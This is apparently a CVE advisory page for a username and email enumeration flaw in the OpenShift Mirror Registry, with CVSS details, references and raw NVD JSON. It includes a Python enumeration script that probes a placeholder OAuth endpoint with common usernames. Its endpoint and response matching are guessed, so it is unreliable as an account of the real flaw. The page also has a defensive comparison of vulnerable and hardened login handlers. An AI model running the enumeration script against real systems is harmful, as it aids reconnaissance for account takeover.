Security Vulnerability Report
CVE-2025-14243 CVSS 5.3 MEDIUM

CVE-2025-14243

Published: 2026-04-08 17:20:25
Last Modified: 2026-04-21 18:06:15

Description

A flaw was found in the OpenShift Mirror Registry. This vulnerability allows an unauthenticated, remote attacker to enumerate valid usernames and email addresses via different error messages during authentication failures and account creation.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:redhat:mirror_registry_for_red_hat_openshift:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:mirror_registry_for_red_hat_openshift:2.0:*:*:*:*:*:*:* - VULNERABLE
OpenShift Mirror Registry (for the specific affected versions, refer to Red Hat's official security advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target endpoint example (adjust based on actual deployment)
target_url = "https://<openshift-registry-host>/oauth/token"
usernames = ["admin", "root", "developer", "test", "kubeadmin"]

print("[+] Starting User Enumeration for CVE-2025-14243...")

for username in usernames:
    # Payload attempting to authenticate
    data = {
        "username": username,
        "password": "InvalidPassword123!"  # Constant invalid password
    }
    try:
        response = requests.post(target_url, data=data, timeout=5)
        # Logic to differentiate responses based on vulnerability description
        # Vulnerability: Different messages for auth fail vs user not found
        if response.status_code == 401 and "password" in response.text.lower():
            print(f"[VALID] User found: {username}")
        elif response.status_code == 404 or "not found" in response.text.lower():
            print(f"[INVALID] User not found: {username}")
        else:
            print(f"[UNKNOWN] Response for {username}: Status {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Connection error: {e}")
```
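The following is an added illustration, not code from the original page or from Red Hat's Mirror Registry: a minimal simulated login and account-creation handler in the shape the description implies. The vulnerable variants answer differently for an unknown account than for a wrong password or an already-registered e-mail (CWE-209, the response difference the PoC above keys on); the hardened variants return one uniform status and message and always run the password check, so neither wording nor timing distinguishes the two cases. The user store, e-mail set and SHA-256 "hashing" are constructed stand-ins for a real user database and password KDF.

```python
import hashlib
import hmac

# Constructed sample data (not real registry data): username -> password hash, known e-mails
USERS = {"admin": hashlib.sha256(b"correct-horse").hexdigest()}
EMAILS = {"admin@example.test"}
# Stand-in hash used for unknown users so the hardened path always does the same work
DUMMY_HASH = hashlib.sha256(b"dummy-for-unknown-users").hexdigest()
GENERIC_LOGIN_ERROR = (401, "invalid username or password")
GENERIC_REGISTER_REPLY = (202, "if this address is eligible, a confirmation has been sent")


def _hash(password: str) -> str:
    # Placeholder for a proper password KDF (argon2/bcrypt/scrypt) in a real system
    return hashlib.sha256(password.encode()).hexdigest()


def vulnerable_login(username: str, password: str) -> tuple[int, str]:
    """Distinct replies: the response itself reveals whether the account exists."""
    if username not in USERS:
        return 404, "user not found"
    if not hmac.compare_digest(USERS[username], _hash(password)):
        return 401, "invalid password"
    return 200, "ok"


def hardened_login(username: str, password: str) -> tuple[int, str]:
    """Same status and message for unknown user and wrong password; hash work is constant."""
    stored = USERS.get(username, DUMMY_HASH)
    match = hmac.compare_digest(stored, _hash(password))  # always evaluated
    if not (match and username in USERS):
        return GENERIC_LOGIN_ERROR
    return 200, "ok"


def vulnerable_register(email: str) -> tuple[int, str]:
    """Account creation that confirms which addresses are already taken."""
    if email in EMAILS:
        return 409, "email already registered"
    return 201, "created"


def hardened_register(email: str) -> tuple[int, str]:
    """Identical reply either way; the real outcome is delivered out of band (e-mail)."""
    if email not in EMAILS:
        EMAILS.add(email)
    return GENERIC_REGISTER_REPLY


def leaks_existence(login) -> bool:
    """Review check: does an unknown user get a different reply than a wrong password?"""
    return login("admin", "wrong-password") != login("no-such-user", "wrong-password")
```

The `leaks_existence` oracle is the kind of check a defender can run against a real endpoint with two test accounts to confirm a fix before and after patching.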

References

https://access.redhat.com/security/cve/CVE-2025-14243 (Vendor Advisory)
https://bugzilla.redhat.com/show_bug.cgi?id=2419829 (Issue Tracking, Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-14243", "sourceIdentifier": "[email protected]", "published": "2026-04-08T17:20:25.247", "lastModified": "2026-04-21T18:06:15.093", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in the OpenShift Mirror Registry. This vulnerability allows an unauthenticated, remote attacker to enumerate valid usernames and email addresses via different error messages during authentication failures and account creation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-209"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:mirror_registry_for_red_hat_openshift:-:*:*:*:*:*:*:*", "matchCriteriaId": "63757310-FC5B-44E6-9211-36269827BC56"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:mirror_registry_for_red_hat_openshift:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "281E6AA4-1E08-488F-BA7A-F0BE7CF42A5B"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-14243", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2419829", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}
```